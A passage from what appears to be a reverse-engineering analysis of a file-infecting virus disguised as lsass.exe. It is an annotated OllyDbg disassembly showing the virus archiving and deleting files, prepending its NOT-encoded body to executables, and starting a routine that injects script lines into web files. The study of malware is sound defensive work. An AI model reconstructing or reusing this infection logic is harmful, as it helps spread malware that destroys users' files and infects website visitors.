004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
004028AC |. 50 |PUSH EAX
004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]
004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
004028B4 |. 50 |PUSH EAX
004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028C1 |. 51 |PUSH ECX
004028C2 |. 50 |PUSH EAX
004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]
004028C6 |. 50 |PUSH EAX
004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
004028D1 |. 50 |PUSH EAX
004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]
004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028D9 |. 50 |PUSH EAX
004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004028DF |. 50 |PUSH EAX
004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23
004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]
004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22
004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]
004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21
004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]
00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20
0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]
00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402925 |. 53 |PUSH EBX
00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402953 |. 51 |PUSH ECX
00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040295D |. 8BC4 |MOV EAX,ESP
0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402962 |. 51 |PUSH ECX
00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402966 |. 51 |PUSH ECX
00402967 |. 50 |PUSH EAX
00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1
00402972 |. 59 |POP ECX
00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
00402976 |. 59 |POP ECX
00402977 |. 50 |PUSH EAX
00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
0040297E |. 50 |PUSH EAX
0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]
00402985 |. 50 |PUSH EAX
00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
00402993 |. 50 |PUSH EAX ; |dest
00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
00402999 |. 59 |POP ECX
0040299A |. 59 |POP ECX
0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]
004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004029A6 |. 53 |PUSH EBX ; /Arg5
004029A7 |. 53 |PUSH EBX ; |Arg4
004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004029AE |. 53 |PUSH EBX ; |Arg3
004029AF |. 50 |PUSH EAX ; |Arg2
004029B0 |. 53 |PUSH EBX ; |Arg1
004029B1 |. 8BCE |MOV ECX,ESI ; |
004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB
004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file
004029BA |. 75 5D |JNZ SHORT LSASS.00402A19
004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"
004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24
004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004029D5 |. 53 |PUSH EBX ; /hTemplateFile
004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
004029DD |. 53 |PUSH EBX ; |pSecurity
004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName
004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
004029F4 |. 51 |PUSH ECX ; /pLastWrite
004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004029F8 |. 51 |PUSH ECX ; |pLastAccess
004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004029FC |. 51 |PUSH ECX ; |pCreationTime
004029FD |. 50 |PUSH EAX ; |hFile
004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject
00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]
00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]
00402A24 |. 57 |PUSH EDI
00402A25 |. 50 |PUSH EAX
00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A2B |. 51 |PUSH ECX
00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
00402A32 |. 8BCC |MOV ECX,ESP
00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402A37 |. 52 |PUSH EDX
00402A38 |. 50 |PUSH EAX
00402A39 |. 51 |PUSH ECX
00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25
00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402A43 |. 8BCE |MOV ECX,ESI
00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1
00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]
00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]
00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA
00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000
00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA
...
00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]
00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]
00402AD0 |. 50 |PUSH EAX ; /pFindFileData
00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile
00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA
00402ADA |. 85C0 |TEST EAX,EAX
00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234
00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch
00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose
2 感染exe文件的函数
00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; exe file infect function
0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>
00406352 |. 83EC 3C SUB ESP,3C
00406355 |. 53 PUSH EBX
00406356 |. 56 PUSH ESI
00406357 |. 8BF1 MOV ESI,ECX
00406359 |. 57 PUSH EDI
0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040636C |. 50 PUSH EAX
0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]
00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48]
0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68]
0040637E |. 50 PUSH EAX ; /statbuf
0040637F |. 57 PUSH EDI ; |path
00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; get file com/lsass.exe base info
00406389 |. 59 POP ECX
0040638A |. 85C0 TEST EAX,EAX
0040638C |. 59 POP ECX
0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX
00406392 |. 75 07 JNZ SHORT LSASS.0040639B
00406394 |> 32DB XOR BL,BL
00406396 |. E9 13010000 JMP LSASS.004064AE
0040639B |> 50 PUSH EAX ; /size
0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc
004063A2 |. 85C0 TEST EAX,EAX ; allocate a memory
004063A4 |. 59 POP ECX
004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; buf
004063AB |.^ 74 E7 JE SHORT LSASS.00406394
004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"
004063B2 |. 57 PUSH EDI ; |path
004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |msvcrt.fopen
004063B9 |. FFD7 CALL EDI ; /fopen
004063BB |. 59 POP ECX ; open file com/lsass.exe
004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
004063BF |. 85C0 TEST EAX,EAX
004063C1 |. 59 POP ECX
004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; read file com/lsass.exe to buf
004063C8 |. 50 PUSH EAX ; /stream
004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |msvcrt.fread
004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = 27004 (159748.)
004063D5 |. 6A 01 PUSH 1 ; |size = 1
004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf
004063DD |. FFD3 CALL EBX ; /fread
004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream
004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |
004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] ; close file handle
004063EE |. 83C4 14 ADD ESP,14
004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]
004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F
004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174]
00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]
00406406 |. 51 PUSH ECX ; /statbuf
00406407 |. 50 PUSH EAX ; |path
00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat
0040640E |. 59 POP ECX ; get need infect file base info to statbuf
0040640F |. 85C0 TEST EAX,EAX
00406411 |. 59 POP ECX
00406412 |. 0F85 74020000 JNZ LSASS.0040668C
00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX
0040641B |. 0F84 6B020000 JE LSASS.0040668C
00406421 |. 8BCE MOV ECX,ESI
00406423 |. E8 DA020000 CALL LSASS.00406702 ; LoadResource here
00406428 |. 84C0 TEST AL,AL
0040642A |. 74 73 JE SHORT LSASS.0040649F
0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; the file can be infected
00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"
00406437 |. 50 PUSH EAX
00406438 |. FFD7 CALL EDI ; open need infect file
0040643A |. 59 POP ECX ; file path
0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; need infect file handle
0040643E |. 85C0 TEST EAX,EAX
00406440 |. 59 POP ECX
00406441 |. 74 5C JE SHORT LSASS.0040649F
00406443 |. 51 PUSH ECX
00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]
0040644A |. 8BCC MOV ECX,ESP
0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
0040644F |. 50 PUSH EAX
00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; check file whether is infected function
0040645A |. 84C0 TEST AL,AL
0040645C |. 59 POP ECX
0040645D |. 74 1B JE SHORT LSASS.0040647A ; jmp if can infected
0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
00406474 |. 59 POP ECX
00406475 |. B3 01 MOV BL,1
00406477 |. 59 POP ECX
00406478 |. EB 34 JMP SHORT LSASS.004064AE
0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET
0040647C |. 6A 00 PUSH 0 ; |offset = 0
0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream
00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek
00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; set need file ptr as 0
0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"
00406492 |. 50 PUSH EAX ; create a temporary file: system32/com/~
00406493 |. FFD7 CALL EDI ; fopen
00406495 |. 83C4 14 ADD ESP,14
00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; com/~ handle
0040649B |. 85C0 TEST EAX,EAX
0040649D |. 75 22 JNZ SHORT LSASS.004064C1
0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
004064A5 |. 32DB XOR BL,BL ; |
004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
004064AD |. 59 POP ECX
004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004064BA |. 8AC3 MOV AL,BL
004064BC |. E9 E6010000 JMP LSASS.004066A7
004064C1 |> 50 PUSH EAX ; /write self-virus file to temporary file(com/~)
004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |msvcrt.fwrite
004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n
004064CB |. 6A 01 PUSH 1 ; |size = 1
004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr
004064D3 |. FFD7 CALL EDI ; /fwrite
004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34]
004064DE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064E0 |. 6A 01 PUSH 1
004064E2 |. 50 PUSH EAX
004064E3 |. FFD7 CALL EDI ; fwrite
004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]
004064EE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~
004064F0 |. 6A 01 PUSH 1
004064F2 |. 50 PUSH EAX
004064F3 |. FFD7 CALL EDI ; fwrite
004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; filestream
004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read all need infect file
00406505 |. 6A 01 PUSH 1
00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; rBuf
0040650D |. FFD3 CALL EBX ; fread
0040650F |. 83C4 40 ADD ESP,40 ;
00406512 |> 85C0 /TEST EAX,EAX ; EXA initial value = 0x1c000(need infect file
size)
00406514 |. 0F84 8B000000 |JE LSASS.004065A5
0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; flag
0040651E |. 74 59 |JE SHORT LSASS.00406579
00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; save inital postion to ECX
00406526 |. 83C1 09 |ADD ECX,9 ; ECX += 9; 224
00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C]
0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX
00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; if ECX > [40D03C](self-virus size) then jmp;
00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040653A |. 03CA ||ADD ECX,EDX
0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
0040653E |. F6D2 ||NOT DL
00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; modified, then save back
00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp
00406545 |. 83C1 0B ||ADD ECX,0B ; ECX += 0x0B; offset = 0x0B
00406548 |.^ EB DF |/JMP SHORT LSASS.00406529
0040654A |> 33C9 |XOR ECX,ECX ; ECX = 0;
0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; if [40D03C] <= ECX then jmp;
00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file
0040655D |. 03CA ||ADD ECX,EDX ; ECX += EDX;
0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]
00406561 |. F6D2 ||NOT DL
00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; midified, then save back
00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp;
00406568 |. 41 ||INC ECX
00406569 |. 41 ||INC ECX ; ECX += 2;
0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;
00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; if ECX < [40D03C](self-virus size) then jmp
(continue decode);
00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; then decode over, write to temporary file
00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; write to file com/~
0040657C |. 50 |PUSH EAX
0040657D |. 6A 01 |PUSH 1
0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406585 |. FFD7 |CALL EDI ; fwrite
00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
00406593 |. 6A 01 |PUSH 1
00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040659B |. FFD3 |CALL EBX ; fread
0040659D |. 83C4 20 |ADD ESP,20
004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512
004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream
004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose
004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; |
004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb"
004065BB |. 50 PUSH EAX ; |path
004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen
004065C2 |. 59 POP ECX ; open com/lsass.exe
004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; handle
004065C6 |. 85C0 TEST EAX,EAX
004065C8 |. 59 POP ECX
004065C9 |. 0F84 BD000000 JE LSASS.0040668C
004065CF |. 50 PUSH EAX
004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1
004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read com/lsass.exe all
004065DA |. 6A 01 PUSH 1
004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]
004065E2 |. FFD3 CALL EBX ; fread
004065E4 |. 83C4 10 ADD ESP,10
004065E7 |> 85C0 /TEST EAX,EAX
004065E9 |. 74 5E |JE SHORT LSASS.00406649
004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0
004065EF |. 74 2F |JE SHORT LSASS.00406620
004065F1 |. 33C9 |XOR ECX,ECX
004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX
004065FC |. 76 1E |JBE SHORT LSASS.0040661C
004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]
00406604 |. 03CA ||ADD ECX,EDX
00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
00406608 |. F6D2 ||NOT DL
0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL
0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
0040660F |. 41 ||INC ECX
00406610 |. 41 ||INC ECX
00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX
0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE
0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0
00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20]
00406623 |. 50 |PUSH EAX
00406624 |. 6A 01 |PUSH 1
00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040662C |. FFD7 |CALL EDI ; fwrite
0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
0040663A |. 6A 01 |PUSH 1
0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406642 |. FFD3 |CALL EBX ; fread, read next
00406644 |. 83C4 20 |ADD ESP,20
00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7
00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C]
00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
00406655 |. 6A 04 PUSH 4
00406657 |. 6A 01 PUSH 1
00406659 |. 50 PUSH EAX
0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX
0040665C |. FFD7 CALL EDI
0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream
00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |msvcrt.fclose
00406667 |. FFD7 CALL EDI ; /fclose
00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]
0040666C |. FFD7 CALL EDI
0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040667A |. 83C4 1C ADD ESP,1C
0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404]
00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1
0040668A |. EB 0D JMP SHORT LSASS.00406699
0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
00406698 |. 59 POP ECX
00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004066A5 |. 32C0 XOR AL,AL
004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004066AA |. 5F POP EDI
004066AB |. 5E POP ESI
004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
004066B3 |. 5B POP EBX
004066B4 |. C9 LEAVE
004066B5 /. C3 RETN
3 web文件感染函数
; ---------------------------------------------------------------------------
; sub_00402B97 - "web file infect" routine (OllyDbg listing, MSVC/MFC42 thiscall)
; Reached from the directory walker at 00402446 on its ".js" branch; the
; "htm"/"tml" compares jump to 00402A61, which is outside this listing.
; In:    ECX = this (ESI below); two CString arguments passed by value:
;        [EBP+8] = path of the file to process
;        [EBP+C] = marker string to search for and, if absent, append
;                  (presumably the document.write(<script ...>) line quoted in
;                  the write-up; the caller builds it from ESI+19D - confirm)
; Out:   nothing meaningful in EAX; RETN 8 pops the two CString args.
; Uses:  EBX = 1 (constant reused as ios flag mask, open mode and EH state),
;        ESI = this, [EBP-10] = CString accumulator, [EBP-6C] = ifstream,
;        [EBP-46C] = 0x400-byte line buffer, [EBP-4] = EH unwind state.
